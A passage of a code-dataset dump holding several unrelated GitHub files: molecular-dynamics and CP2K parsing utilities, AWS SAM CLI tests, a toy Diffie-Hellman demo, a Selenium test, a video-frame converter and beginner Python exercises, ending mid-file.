np.array(pairsListIndices)\n\n\n\ndef create_pairIndices_from_indices(pairNames):\n \"\"\"Get the indices list from the indices input\n\n Parameters\n ----------\n pairNames : list\n List containing the indices. Pairs are separated by a space. Atoms inside a pair are separated by '-'\n\n Returns\n -------\n pairsListIndices : list\n List containing the different indices\n \"\"\"\n # Initialization\n pairsListIndices = []\n # Loop over all the pair and convert\n for i, pair in enumerate(pairNames):\n pair = pair.split('-')\n pair = [int(i) for i in pair]\n pairsListIndices.append(pair)\n\n print(f\"Found indices: {pairsListIndices}\")\n \n return np.array(pairsListIndices)\n\n\ndef get_kT(T):\n \"\"\"Compute kT\n\n Parameters\n ----------\n T : float\n Temperature of the system\n\n Returns\n -------\n kT : float\n kT\n \"\"\"\n return scipy.constants.R * T / 1000\n\n\ndef save_model(cluster, msm, outdir, filename, model_name):\n \"\"\"Save the given model in a .pyemma file\n\n Parameters\n ----------\n cluster : pyemma.cluster type\n PyEmma cluster\n msm : pyemma.msm\n PyEmma estimation MSM\n outdir : str\n Output directory\n filename : str\n Name of the file in the output directory\n model_name : str\n Name to give to the model\n \"\"\"\n # Save the cluster\n cluster.save(\n f\"{outdir}/{filename}\", model_name=f\"{model_name}_cluster\", overwrite=True\n )\n # Save the MSM\n msm.save(f\"{outdir}/{filename}\", model_name=f\"{model_name}_msm\", overwrite=True)\n # Confirmation print\n print(f\"Cluster and MSM saved in {outdir}/{filename} with model name {model_name}\")\n\n\ndef load_model(outdir, filename, model_name):\n \"\"\"Load previous PyEmma model\n\n Parameters\n ----------\n outdir : str\n Output directory\n filename : str\n Name of the file in the output directory\n model_name : str\n Name to give to the model\n\n Returns\n -------\n cluster : pyemma.cluster type\n PyEmma cluster\n msm : pyemma.msm\n PyEmma estimation MSM\n \"\"\"\n # Load MSM\n msm = pyemma.load(f\"{outdir}/{filename}\", model_name=f\"{model_name}_msm\")\n # Load cluster\n cluster = pyemma.load(f\"{outdir}/{filename}\", model_name=f\"{model_name}_cluster\")\n # Confirmation print\n print(\n f\"Cluster and MSM loaded from {outdir}/{filename} with model name {model_name}\"\n )\n\n return msm, cluster\n\ndef read_feat_from_txt(file_path,quality_max):\n \"\"\"Read features from .txt files\n\n Parameters\n ----------\n file_path : str\n Path to the .txt file. This file contain all the interaction we want to consider. Each line is an interaction. The first line is a header.\n - Column 1 : index of the interaction (not useful)\n - Column 2 : index of the i residue\n - Column 3 : index of the j residue\n - Column 4 : quality of the interaction (1: good quality then decreasing, must be int)\n \n quality_max : int\n Maximum quality to consider (1: good quality then decreasing, must be int)\n\n Returns\n -------\n selection : np.array\n Array containing the selected atom indices\n \"\"\"\n\n data = np.loadtxt(\n file_path,\n skiprows=1,\n usecols=(0,1,2,3),\n dtype=int\n )\n # Select with a certain quality\n selection = data[data[:,-1] == quality_max]\n # Get the pair indices\n pair_indices = selection[:,1:3]\n # Remove the double interaction\n unique = remove_double(pair_indices)\n print(f\"Found indices {unique}\")\n \n return unique\n\ndef remove_double(pair_indices):\n \"\"\"Remove any double interaction\n\n Parameters\n ----------\n pair_indices : np.array\n Array containing the different interaction\n\n Returns\n -------\n unique : np.array\n Array containing the different interaction without double interaction\n \"\"\"\n # Sort to make sure the interaction A/B and B/A are not taken\n sorted = np.sort(pair_indices,axis=1)\n # Get only the unique interaction\n unique = np.unique(sorted,axis=0)\n return unique\n\n\n\nif __name__ == \"__main__\":\n refGS = \"/data/cloison/Simulations/HSP90-NT/SIMULATIONS_TRAJECTORIES/AMBER19SB_OPC/GS_cluster1.pdb\"\n pairNames = [\"64_CA-130_CA\", \"119_CA-24_CA\"]\n print(create_pairIndices_from_pairNames(pdbfilename=refGS, pairNames=pairNames))\n pairNames = ['16-109','17-109','18-109']\n print(create_pairIndices_from_indices(pairNames))\n file_path = '/home/ccattin/Documents/Markov/HSP90/Amber19_OPC_300K/elisa_feat/2022_10_26_Liste_interactions_simulations.txt'\n pair_indices = read_feat_from_txt(file_path,1)\n pair_indices = remove_double(pair_indices=pair_indices)\n print(create_pairIndices_from_txt(refGS,pairNames=pair_indices))\n\n","repo_name":"comecattin/ILM","sub_path":"Markov/Lethe/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":7415,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"41319666023","text":"#! /usr/env/bin python\n\nimport copy\nimport linecache\nfrom collections import OrderedDict\nfrom CP2K_kit.tools import data_op\nfrom CP2K_kit.tools import log_info\n\n#This module is used to read input file. It is a bit complicated!\n#We have to use it now. But the further revisions are on the way.\n#Currently, we haven't written enough comments. We hope it could\n#work for a long time.\n\ndef get_keyword(part_range, inp):\n\n keyword = []\n keyword_index = []\n for i in range(part_range[0],part_range[1]+1,1):\n line_i = linecache.getline(inp,i)\n if ('&' in line_i):\n index_1 = line_i.index('&')\n index_2 = line_i.index('\\n')\n keyword_index.append(i)\n keyword.append(line_i[index_1+1:index_2])\n\n linecache.clearcache()\n\n return keyword, keyword_index\n\ndef get_keyword_block(keyword, keyword_index):\n\n keyword_block = []\n keyword_block_index = []\n for i in range(len(keyword)):\n key_same_num = 0\n end_key_same_num = 0\n for j in range(i,len(keyword),1):\n if ( keyword[i] == keyword[j] ):\n key_same_num = key_same_num + 1\n if ( keyword[i] != keyword[j] and keyword[i] in keyword[j]):\n end_key_same_num = end_key_same_num + 1\n if ( key_same_num == 0 or key_same_num == end_key_same_num ):\n keyword_block.append(keyword[i])\n keyword_block_index.append([keyword_index[i]+1,keyword_index[j]-1])\n break\n\n return keyword_block, keyword_block_index\n\ndef get_dump(keyword_block, keyword_block_index, inp):\n\n dump_dic = OrderedDict()\n\n sys_num = 0\n for i in range(len(keyword_block)):\n if ( keyword_block[i] == 'group' ):\n keyword_block[i] = 'group' + str(sys_num)\n sys_num = sys_num + 1\n\n sys_num = 0\n for i in range(len(keyword_block)):\n if ( keyword_block[i] == 'system' ):\n keyword_block[i] = 'system' + str(sys_num)\n sys_num = sys_num + 1\n\n sys_num = 0\n for i in range(len(keyword_block)):\n if ( keyword_block[i] == 'connect' ):\n keyword_block[i] = 'connect' + str(sys_num)\n sys_num = sys_num + 1\n\n if ( len(keyword_block) == 1 ):\n for i in range(keyword_block_index[0][0],keyword_block_index[0][1]+1,1):\n line_i = linecache.getline(inp, i)\n line_i_split = data_op.split_str(line_i, ' ', '\\n')\n if ( len(line_i_split) == 2 ):\n dump_dic[line_i_split[0]] = line_i_split[1]\n elif ( len(line_i_split) > 2 ):\n line_i_split[len(line_i_split)-1] = line_i_split[len(line_i_split)-1]\n dump_dic[line_i_split[0]] = line_i_split[1:len(line_i_split)]\n else:\n for i in range(0, len(keyword_block), 1):\n\n i_list = data_op.gen_list(keyword_block_index[i][0],keyword_block_index[i][1],1)\n i_dic = OrderedDict()\n sub_key = []\n sub_key_index = []\n\n for j in range(1, len(keyword_block), 1):\n if ( i != j ):\n if ( keyword_block_index[i][0] < keyword_block_index[j][0] \\\n and keyword_block_index[i][1] > keyword_block_index[j][1] ):\n j_list = data_op.gen_list(keyword_block_index[j][0],keyword_block_index[j][1],1)\n sub_key.append(keyword_block[j])\n sub_key_index.append(j_list)\n j_list_temp = data_op.gen_list(keyword_block_index[j][0]-1,keyword_block_index[j][1]+1,1)\n i_list = [x for x in i_list if x not in j_list_temp]\n elif ( keyword_block_index[i][0] > keyword_block_index[j][0] \\\n and keyword_block_index[i][1] < keyword_block_index[j][1] ):\n i_list = []\n break\n\n if ( i_list == [] and sub_key != [] and i != 0 ):\n for j in range(len(sub_key)):\n j_dic = OrderedDict()\n for k in sub_key_index[j]:\n line_k = linecache.getline(inp, k)\n line_k_split = data_op.split_str(line_k, ' ', '\\n')\n if ( len(line_k_split) == 2 ):\n j_dic[line_k_split[0]] = line_k_split[1]\n elif ( len(line_k_split) > 2 ):\n line_k_split[len(line_k_split)-1] = line_k_split[len(line_k_split)-1]\n j_dic[line_k_split[0]] = line_k_split[1:len(line_k_split)]\n i_dic[sub_key[j]] = j_dic\n dump_dic[keyword_block[i]] = i_dic\n\n elif ( i_list != [] and sub_key != [] and i != 0 ):\n for j in i_list:\n line_j = linecache.getline(inp, j)\n line_j_split = data_op.split_str(line_j, ' ', '\\n')\n if ( len(line_j_split) == 2 ):\n i_dic[line_j_split[0]] = line_j_split[1]\n elif ( len(line_j_split) > 2 ):\n line_j_split[len(line_j_split)-1] = line_j_split[len(line_j_split)-1]\n i_dic[line_j_split[0]] = line_j_split[1:len(line_j_split)]\n for j in range(len(sub_key)):\n if ( sub_key[j] in dump_dic ):\n dump_dic.pop(sub_key[j])\n j_dic = OrderedDict()\n for k in sub_key_index[j]:\n line_k = linecache.getline(inp, k)\n line_k_split = data_op.split_str(line_k, ' ', '\\n')\n if ( len(line_k_split) == 2 ):\n j_dic[line_k_split[0]] = line_k_split[1]\n elif ( len(line_k_split) > 2 ):\n line_k_split[len(line_k_split)-1] = line_k_split[len(line_k_split)-1]\n j_dic[line_k_split[0]] = line_k_split[1:len(line_k_split)]\n i_dic[sub_key[j]] = j_dic\n dump_dic[keyword_block[i]] = i_dic\n\n elif ( i_list != [] and sub_key == []):\n for j in i_list:\n line_j = linecache.getline(inp, j)\n line_j_split = data_op.split_str(line_j, ' ', '\\n')\n if ( len(line_j_split) == 2 ):\n i_dic[line_j_split[0]] = line_j_split[1]\n elif ( len(line_j_split) > 2 ):\n line_j_split[len(line_j_split)-1] = line_j_split[len(line_j_split)-1]\n i_dic[line_j_split[0]] = line_j_split[1:len(line_j_split)]\n dump_dic[keyword_block[i]] = i_dic\n\n elif ( i_list != [] and sub_key != [] and i == 0):\n for j in i_list:\n line_j = linecache.getline(inp, j)\n line_j_split = data_op.split_str(line_j, ' ', '\\n')\n if ( len(line_j_split) == 2 ):\n dump_dic[line_j_split[0]] = line_j_split[1]\n elif ( len(line_j_split) > 2 ):\n line_j_split[len(line_j_split)-1] = line_j_split[len(line_j_split)-1]\n dump_dic[line_j_split[0]] = line_j_split[1:len(line_j_split)]\n for j in range(len(sub_key)):\n j_dic = OrderedDict()\n for k in sub_key_index[j]:\n line_k = linecache.getline(inp, k)\n line_k_split = data_op.split_str(line_k, ' ', '\\n')\n if ( len(line_k_split) == 2 ):\n j_dic[line_k_split[0]] = line_k_split[1]\n elif ( len(line_k_split) > 2 ):\n line_k_split[len(line_k_split)-1] = line_k_split[len(line_k_split)-1]\n j_dic[line_k_split[0]] = line_k_split[1:len(line_k_split)]\n dump_dic[sub_key[j]] = j_dic\n\n linecache.clearcache()\n\n return dump_dic\n\ndef dump_info(work_dir, inp_file, f_key):\n\n f_key_copy = copy.deepcopy(f_key)\n input_file = work_dir + '/' + inp_file\n whole_line_num = len(open(input_file).readlines())\n inp_parse = []\n\n f_key_range = []\n\n for keyword in f_key_copy:\n keyword_range = []\n for i in range(whole_line_num):\n line_i = linecache.getline(input_file, i+1)\n if ( keyword in line_i and '&' in line_i ):\n keyword_range.append(i+1)\n f_key_range.append(keyword_range)\n\n linecache.clearcache()\n\n for i in range(len(f_key_range)):\n if ( len(f_key_range[i]) != 2):\n log_info.log_error('The %s parse is incompleted' %(f_key[i]))\n exit()\n\n for i in range(len(f_key_copy)):\n f_key_i, f_key_i_index = get_keyword(f_key_range[i], input_file)\n\n f_key_i_block, f_key_i_block_index = \\\n get_keyword_block(f_key_i, f_key_i_index)\n\n f_key_i_dic = get_dump(f_key_i_block, f_key_i_block_index, input_file)\n\n inp_parse.append(f_key_i_dic)\n\n inp_parse_copy = copy.deepcopy(inp_parse)\n\n for i in range(len(inp_parse)):\n for key1 in inp_parse[i]:\n for key2 in inp_parse[i]:\n if ( type(inp_parse[i][key2]) == OrderedDict and key1 in inp_parse[i][key2].keys() ):\n inp_parse_copy[i].pop(key1)\n\n return inp_parse_copy\n\nif __name__ == '__main__':\n from CP2K_kit.analyze import read_input\n work_dir = '/home/lujunbo/code/github/CP2K_kit/example/analyze/coord_num'\n inp_file = 'input.inp'\n f_key = ['geometry']\n inp_parse = read_input.dump_info(work_dir, inp_file, f_key)\n print (inp_parse)\n","repo_name":"JunboLu/CP2K_kit","sub_path":"tools/read_input.py","file_name":"read_input.py","file_ext":"py","file_size_in_byte":8423,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"69"}
+{"seq_id":"16811840047","text":"import os\nimport boto3\nimport json\nfrom unittest import skipIf\nfrom tests.integration.list.resources.resources_integ_base import ResourcesIntegBase\nfrom samcli.commands.list.resources.command import HELP_TEXT\nfrom tests.testing_utils import CI_OVERRIDE, RUN_BY_CANARY\nfrom tests.testing_utils import run_command, run_command_with_input, method_to_stack_name\n\nCFN_PYTHON_VERSION_SUFFIX = os.environ.get(\"PYTHON_VERSION\", \"0.0.0\").replace(\".\", \"-\")\n\n\n@skipIf(\n (not RUN_BY_CANARY and not CI_OVERRIDE),\n \"Skip List test cases unless running in CI\",\n)\nclass TestResources(ResourcesIntegBase):\n def setUp(self):\n self.cf_client = boto3.client(\"cloudformation\")\n super().setUp()\n\n def test_resources_help_message(self):\n cmdlist = self.get_resources_command_list(help=True)\n command_result = run_command(cmdlist)\n from_command = \"\".join(command_result.stdout.decode().split())\n from_help = \"\".join(HELP_TEXT.split())\n self.assertIn(from_help, from_command, \"Resources help text should have been printed\")\n\n def test_successful_transform(self):\n template_path = self.list_test_data_path.joinpath(\"test_stack_creation_template.yaml\")\n region = boto3.Session().region_name\n cmdlist = self.get_resources_command_list(\n stack_name=None, region=region, output=\"json\", template_file=template_path\n )\n command_result = run_command(cmdlist, cwd=self.working_dir)\n command_output = json.loads(command_result.stdout.decode())\n self.assertEqual(len(command_output), 6)\n self.assert_resource(command_output, \"HelloWorldFunction\", \"-\")\n self.assert_resource(command_output, \"HelloWorldFunctionRole\", \"-\")\n self.assert_resource(command_output, \"HelloWorldFunctionHelloWorldPermissionProd\", \"-\")\n self.assert_resource(command_output, \"ServerlessRestApi\", \"-\")\n self.assert_resource(command_output, \"ServerlessRestApiProdStage\", \"-\")\n self.assert_resource(command_output, \"ServerlessRestApiDeployment.*\", \"-\")\n\n def test_invalid_template_file(self):\n template_path = self.list_test_data_path.joinpath(\"test_resources_invalid_sam_template.yaml\")\n region = boto3.Session().region_name\n cmdlist = self.get_resources_command_list(\n stack_name=None, region=region, output=\"json\", template_file=template_path\n )\n command_result = run_command(cmdlist, cwd=self.working_dir)\n self.assertIn(\n \"Error: [InvalidTemplateException(\\\"'Resources' section is required\\\")] 'Resources' section is required\",\n command_result.stderr.decode(),\n )\n\n def test_success_with_stack_name(self):\n template_path = self.list_test_data_path.joinpath(\"test_stack_creation_template.yaml\")\n stack_name = method_to_stack_name(self.id())\n region = boto3.Session().region_name\n deploy_command_list = self.get_deploy_command_list(\n template_file=template_path,\n guided=True,\n region=region,\n confirm_changeset=True,\n disable_rollback=True,\n )\n run_command_with_input(\n deploy_command_list, \"{}\\n{}\\nY\\nY\\nY\\nY\\nY\\n\\n\\nY\\n\".format(stack_name, region).encode()\n )\n self.stacks.append({\"name\": stack_name})\n\n cmdlist = self.get_resources_command_list(\n stack_name=stack_name, region=region, output=\"json\", template_file=template_path\n )\n command_result = run_command(cmdlist, cwd=self.working_dir)\n command_output = json.loads(command_result.stdout.decode())\n self.assertEqual(len(command_output), 7)\n self.assert_resource(command_output, \"HelloWorldFunction\", \".*HelloWorldFunction.*\")\n self.assert_resource(command_output, \"HelloWorldFunctionRole\", \".*HelloWorldFunctionRole.*\")\n self.assert_resource(\n command_output,\n \"HelloWorldFunctionHelloWorldPermissionProd\",\n \".*HelloWorldFunctionHelloWorldPermissionProd.*\",\n )\n self.assert_resource(command_output, \"ServerlessRestApi\", \".*\")\n self.assert_resource(command_output, \"ServerlessRestApiProdStage\", \".*\")\n self.assert_resource(command_output, \"ServerlessRestApiDeployment.*\", \".*\")\n\n def test_stack_does_not_exist(self):\n template_path = self.list_test_data_path.joinpath(\"test_stack_creation_template.yaml\")\n stack_name = method_to_stack_name(self.id())\n region = boto3.Session().region_name\n cmdlist = self.get_resources_command_list(\n stack_name=stack_name, region=region, output=\"json\", template_file=template_path\n )\n command_result = run_command(cmdlist, cwd=self.working_dir)\n expected_output = (\n f\"Error: The input stack {stack_name} does\" f\" not exist on Cloudformation in the region {region}\"\n )\n self.assertIn(\n expected_output, command_result.stderr.decode(), \"Should have raised error that outputs do not exist\"\n )\n","repo_name":"aws/aws-sam-cli","sub_path":"tests/integration/list/resources/test_resources_command.py","file_name":"test_resources_command.py","file_ext":"py","file_size_in_byte":5031,"program_lang":"python","lang":"en","doc_type":"code","stars":6381,"dataset":"github-code","pt":"69"}
+{"seq_id":"17272445992","text":"import random\nimport math\n\n\ndef is_prime(n, k=5):\n if n <= 1 or n % 2 == 0:\n return False\n if n == 2 or n == 3:\n return True\n\n s, d = 0, n - 1\n while d % 2 == 0:\n s += 1\n d //= 2\n\n for _ in range(k):\n a = random.randint(2, n - 2)\n x = pow(a, d, n)\n if x == 1 or x == n - 1:\n continue\n for _ in range(s - 1):\n x = pow(x, 2, n)\n if x == n - 1:\n break\n else:\n return False\n return True\n\n\ndef generate_prime(bits):\n while True:\n p = random.getrandbits(bits)\n if is_prime(p):\n return p\n\n\ndef primitive_root(p):\n for g in range(2, p):\n if math.gcd(g, p) == 1:\n return g\n\n\ndef diffie_hellman_key_exchange():\n p = generate_prime(16)\n g = primitive_root(p)\n\n private_key_a = random.randint(2, p - 1)\n private_key_b = random.randint(2, p - 1)\n\n public_key_a = pow(g, private_key_a, p)\n public_key_b = pow(g, private_key_b, p)\n\n shared_key_a = pow(public_key_b, private_key_a, p)\n shared_key_b = pow(public_key_a, private_key_b, p)\n\n print(\"p:\", p)\n print(\"g:\", g)\n print(\"Open key A:\", public_key_a)\n print(\"Open key B:\", public_key_b)\n print(\"Shared key A:\", shared_key_a)\n print(\"Shared key B:\", shared_key_b)\n\n\nif __name__ == \"__main__\":\n diffie_hellman_key_exchange()","repo_name":"untble/uni-crypto","sub_path":"lab8/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70276189980","text":"import pytest\nfrom selenium import webdriver\nfrom selenium.webdriver import FirefoxOptions\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nopts = FirefoxOptions()\nopts.add_argument(\"--headless\")\ndriver = webdriver.Firefox(firefox_options=opts)\n# Get the homepage\ndriver.get(\"http://172.28.5.2:80\")\nprint(driver.title)\nprint(driver.current_url)\nassert \"Data API test harness\" in driver.title\nprint(\"Clicking init button\")\ninit_elem = driver.find_element_by_xpath(\"//input[@name='init']\")\ninit_elem.click()\nassert \"init\" in driver.current_url\nassert \"csv loaded\" in driver.page_source\nfor i in range(0, 9):\n print(\"Clicking listCust button\")\n cust_elem = driver.find_element_by_xpath(\"//input[@name='listCust']\")\n cust_elem.click()\n assert \"listCust\" in driver.current_url\n assert \"customer\" in driver.find_element_by_xpath(\"/html/body/pre/code/span[4]\").text\n print(\"Clicking listProd button\")\n prod_elem = driver.find_element_by_xpath(\"//input[@name='listProd']\")\n prod_elem.click()\n assert \"listProd\" in driver.current_url\n assert \"product\" in driver.find_element_by_xpath(\"/html/body/pre/code/span[4]\").text\n print(\"Clicking listTotal button\")\n total_elem = driver.find_element_by_xpath(\"//input[@name='listTotal']\")\n total_elem.click()\n assert \"listTotal\" in driver.current_url\n assert \"Australia\" in driver.find_element_by_xpath(\"/html/body/pre/code/span[5]\").text\ndriver.close()\n","repo_name":"c12k/ttyd-intern-project","sub_path":"devops/Test-scripts/data-tests/test_data_api.py","file_name":"test_data_api.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"70056866460","text":"class Node:\n\tdef __init__(self, weights, offset):\n\t\tself.weights = weights\n\t\tself.offset = offset\n\t\n\t# map inputs v_i's (0's and 1's) from input list x and weights to an output 0 or 1\n\tdef eval(self, inputList):\n\t\ttotal = self.offset\n\t\tfor w,v in zip(self.weights, inputList):\n\t\t\ttotal += w*v\n\t\treturn 1 if total > 0 else 0 #ternary\n\nned = Node([-0.5, -0.5], 0)\nprint(ned.eval([1, 1])) # need 0\nprint(ned.eval([1, 0])) # need 1\nprint(ned.eval([0, 1])) # need 1\nprint(ned.eval([0, 0])) # need 0\n\n# use many nodes (maybe 3 or more) to make x04\n\n\n","repo_name":"ornaverum/ICS2019_2020","sub_path":"NN/KNN.py","file_name":"KNN.py","file_ext":"py","file_size_in_byte":544,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"69"}
+{"seq_id":"9311321173","text":"\"\"\"\n@author: Tristan Chevreau\n\nA converter for transforming mp4 videos to jpg grayscales.\n\nInput :\n- mp4 video\n\nOutput :\n- a jpg grayscale for each frame, usable for OCR, whose name is its frame number.\n- a pickle file linking the image file name to the timestamp.\n\"\"\"\n\nimport os\nimport cv2\nimport pickle\nfrom tkinter.filedialog import askopenfilename\n\nfrom data.constants import timestamps_filename\n\n\ndef progress_bar(percent, length=20):\n \"\"\" This displays a progress bar in command-line, erasing the last line.\n :param percent: the percentage at which the progress bar is full\n :param length: the size of the progress bar\n :return: None\n \"\"\"\n str_ = \"#\" * int(length*percent/100)\n while len(str_) < length:\n str_ += \"-\"\n n, d = str(round(percent, 2)).split(\".\")\n print(f\"[step1][{n.zfill(2)}.{d.ljust(2, '0')}%] converting ... [{str_}]\", end='\\r')\n\n\ndef step1_conversion(file_name, folder_name, callback=lambda r: None):\n \"\"\" This function contains all the things to execute during step1.\n :param file_name: the name of the .mp4 file to convert.\n :param folder_name: the folder in which to save the frames.\n :param callback: the function to call to update a display.\n :return: None\n \"\"\"\n # create the folder\n if not os.path.exists(folder_name):\n os.mkdir(folder_name)\n # open the video\n cap = cv2.VideoCapture(file_name)\n video_length = int(cap.get(cv2.CAP_PROP_FRAME_COUNT)) - 1\n count = 0\n timestamps = {}\n # read it until the end\n while cap.isOpened():\n ret, frame = cap.read()\n if not ret: # if the frame was not kept ...\n continue # ... ignore it\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n timestamps[f\"{count:08d}.jpg\"] = cap.get(cv2.CAP_PROP_POS_MSEC)\n cv2.imwrite(folder_name + \"/\" + f\"{count:08d}\" + \".jpg\", gray)\n count += 1\n if count > (video_length - 1): # if we read all the frames ...\n cap.release() # ... close the video\n callback(count / video_length * 100)\n # save the timestamps\n with open(folder_name + timestamps_filename, \"wb\") as f:\n pickle.dump(timestamps, f, protocol=pickle.HIGHEST_PROTOCOL)\n\n\nif __name__==\"__main__\":\n\n print(\"[step1] choose the path of the video\")\n video_path = askopenfilename(filetypes=[(\"MPEG4 File\", \"*.mp4\")])\n if video_path == \"\":\n raise ValueError(\"you did not enter a filepath\")\n print()\n\n print()\n print(\"[step1] beginning conversion ...\")\n print()\n\n step1_conversion(video_path, \".\".join(video_path.split(\".\")[:-1]), callback=progress_bar)\n print(f\"[step1] > {video_path} was converted to jpg grayscales and timestamps pickle\")\n print()\n","repo_name":"trischevreau/Frame-Coupler","sub_path":"step1_converter.py","file_name":"step1_converter.py","file_ext":"py","file_size_in_byte":2718,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"74522273818","text":"# 1\n#\nlimit = list(range(11))\n\nfor num in limit:\n pass\n # print(num)\n\nnum = 0\nwhile num < 10:\n # print(num)\n num = num + 1\n\n# 2\n\ndigit = 10\ndigitToRange = list(range(digit))\n# while digit > 0:\n# # print(digit)\n# # digit -= 1\n\n# COMING BACK\nfor num in digitToRange:\n pass\n # print(num)\n\n\n# 3 - 5\n\n\n# 6\nlanguage = ['Python', 'Numpy','Pandas','Django', 'Flask']\nfor lang in language:\n pass\n # print(lang)\n\n# 7\n\nto_hundred = list(range(101))\n\nfor num in to_hundred:\n if num % 2 == 0:\n pass\n # print(num)\n else:\n pass\n # print(num)\n\n# 8\n\n\nfor num in to_hundred:\n if num % 2 != 0:\n # print(num)\n pass\n\n\n# 9\n\ntotal = 0\nfor num in to_hundred:\n total = num + total\nelse:\n # print(f\"The sum of all numbers is {total}\")\n pass\n\n\n# 10\nodds = 0\neven = 0\n\nfor num in to_hundred:\n if num % 2 == 0:\n even = num + even\n else:\n odds = num + odds\nelse:\n print(f\"The sum of all evens is {even}, and the sum for all odds is {odds}\")\n\n# 11\ncountries = [\n 'Afghanistan',\n 'Albania',\n 'Algeria',\n 'Andorra',\n 'Angola',\n 'Antigua and Barbuda',\n 'Argentina',\n 'Armenia',\n 'Australia',\n 'Austria',\n 'Azerbaijan',\n 'Bahamas',\n 'Bahrain',\n 'Bangladesh',\n 'Barbados',\n 'Belarus',\n 'Belgium',\n 'Belize',\n 'Benin',\n 'Bhutan',\n 'Bolivia',\n 'Bosnia and Herzegovina',\n 'Botswana',\n 'Brazil',\n 'Brunei',\n 'Bulgaria',\n 'Burkina Faso',\n 'Burundi',\n 'Cambodia',\n 'Cameroon',\n 'Canada',\n 'Cape Verde',\n 'Central African Republic',\n 'Chad',\n 'Chile',\n 'China',\n 'Colombi',\n 'Comoros',\n 'Congo (Brazzaville)',\n 'Congo',\n 'Costa Rica',\n \"Cote d'Ivoire\",\n 'Croatia',\n 'Cuba',\n 'Cyprus',\n 'Czech Republic',\n 'Denmark',\n 'Djibouti',\n 'Dominica',\n 'Dominican Republic',\n 'East Timor (Timor Timur)',\n 'Ecuador',\n 'Egypt',\n 'El Salvador',\n 'Equatorial Guinea',\n 'Eritrea',\n 'Estonia',\n 'Ethiopia',\n 'Fiji',\n 'Finland',\n 'France',\n 'Gabon',\n 'Gambia, The',\n 'Georgia',\n 'Germany',\n 'Ghana',\n 'Greece',\n 'Grenada',\n 'Guatemala',\n 'Guinea',\n 'Guinea-Bissau',\n 'Guyana',\n 'Haiti',\n 'Honduras',\n 'Hungary',\n 'Iceland',\n 'India',\n 'Indonesia',\n 'Iran',\n 'Iraq',\n 'Ireland',\n 'Israel',\n 'Italy',\n 'Jamaica',\n 'Japan',\n 'Jordan',\n 'Kazakhstan',\n 'Kenya',\n 'Kiribati',\n 'Korea, North',\n 'Korea, South',\n 'Kuwait',\n 'Kyrgyzstan',\n 'Laos',\n 'Latvia',\n 'Lebanon',\n 'Lesotho',\n 'Liberia',\n 'Libya',\n 'Liechtenstein',\n 'Lithuania',\n 'Luxembourg',\n 'Macedonia',\n 'Madagascar',\n 'Malawi',\n 'Malaysia',\n 'Maldives',\n 'Mali',\n 'Malta',\n 'Marshall Islands',\n 'Mauritania',\n 'Mauritius',\n 'Mexico',\n 'Micronesia',\n 'Moldova',\n 'Monaco',\n 'Mongolia',\n 'Morocco',\n 'Mozambique',\n 'Myanmar',\n 'Namibia',\n 'Nauru',\n 'Nepal',\n 'Netherlands',\n 'New Zealand',\n 'Nicaragua',\n 'Niger',\n 'Nigeria',\n 'Norway',\n 'Oman',\n 'Pakistan',\n 'Palau',\n 'Panama',\n 'Papua New Guinea',\n 'Paraguay',\n 'Peru',\n 'Philippines',\n 'Poland',\n 'Portugal',\n 'Qatar',\n 'Romania',\n 'Russia',\n 'Rwanda',\n 'Saint Kitts and Nevis',\n 'Saint Lucia',\n 'Saint Vincent',\n 'Samoa',\n 'San Marino',\n 'Sao Tome and Principe',\n 'Saudi Arabia',\n 'Senegal',\n 'Serbia and Montenegro',\n 'Seychelles',\n 'Sierra Leone',\n 'Singapore',\n 'Slovakia',\n 'Slovenia',\n 'Solomon Islands',\n 'Somalia',\n 'South Africa',\n 'Spain',\n 'Sri Lanka',\n 'Sudan',\n 'Suriname',\n 'Swaziland',\n 'Sweden',\n 'Switzerland',\n 'Syria',\n 'Taiwan',\n 'Tajikistan',\n 'Tanzania',\n 'Thailand',\n 'Togo',\n 'Tonga',\n 'Trinidad and Tobago',\n 'Tunisia',\n 'Turkey',\n 'Turkmenistan',\n 'Tuvalu',\n 'Uganda',\n 'Ukraine',\n 'United Arab Emirates',\n 'United Kingdom',\n 'United States',\n 'Uruguay',\n 'Uzbekistan',\n 'Vanuatu',\n 'Vatican City',\n 'Venezuela',\n 'Vietnam',\n 'Yemen',\n 'Zambia',\n 'Zimbabwe',\n];\n\nfor country in countries:\n if \"land\" in country:\n print(country)\n\n\n\n\n# 12\nfruit = ['banana', 'orange', 'mango', 'lemon']\nfruit.reverse();\nprint(fruit)","repo_name":"auleki/30days_of_python","sub_path":"day_10/day_10.py","file_name":"day_10.py","file_ext":"py","file_size_in_byte":4004,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"75022306139","text":"# -*- coding: utf-8 -*-\n\n#file containing definition of \"Item\" type : base for all object which will move\n\n#search for tag \"#PERFORMANCE\" to see which lines can be commented to increase performances\n\nimport Object #importation of base type\nimport Tools\n\nimport sys\nimport time\n\n\nattributesList = [\"datas\",\"x\",\"y\",\"width\",\"height\",\"color\",\"vX\",\"vY\",\"aX\",\"aY\",\"sprites\"]\n#datas,x,y,width,height,color : see Object.py\n#vX : float : item x speed\n#vY : float : item y speed\n#aX : float : item x acceleration\n#aY : float : item y acceleration\n#sprites : list : list of 2D arrays to replace \"datas\" and print differents appearances function of state\n\n##########################\n#\n#\tConstructor\n#\n##########################\n\ndef Item(datas,x = 0, y = 0, color = None,vX=0,vY=0,aX=0,aY=0):\n\tassert type(vX) is float or type(vX) is int\n\tassert type(vY) is float or type(vY) is int\n\tassert type(aX) is float or type(aX) is int\n\tassert type(aY) is float or type(aY) is int\n\n\tbase = Object.Object(datas,x,y,color)\n\tbase[\"sprites\"] = [datas] #sprites[0] will always be base data\n\tbase[\"vX\"] = 